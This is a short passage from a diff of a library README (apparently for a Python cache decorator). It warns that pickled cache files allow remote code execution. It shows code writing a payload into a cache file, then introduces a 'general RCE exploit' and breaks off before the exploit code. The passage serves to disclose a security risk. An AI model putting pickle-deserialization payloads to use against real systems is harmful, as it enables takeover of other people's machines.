zommiommy/cache_decorator/README.rst

     with open("./cache/1.pkl", "wb") as f:
         f.write(payload)

+Next time that the function is called with argument ``1``, we will spawn a remote shell and take control of the system.

 Or, since Pickle is a "programming language" which is executed by a VM, we can write a general RCE exploit which only uses builtins:

 .. code:: python

     import pickle

     # Build the exploit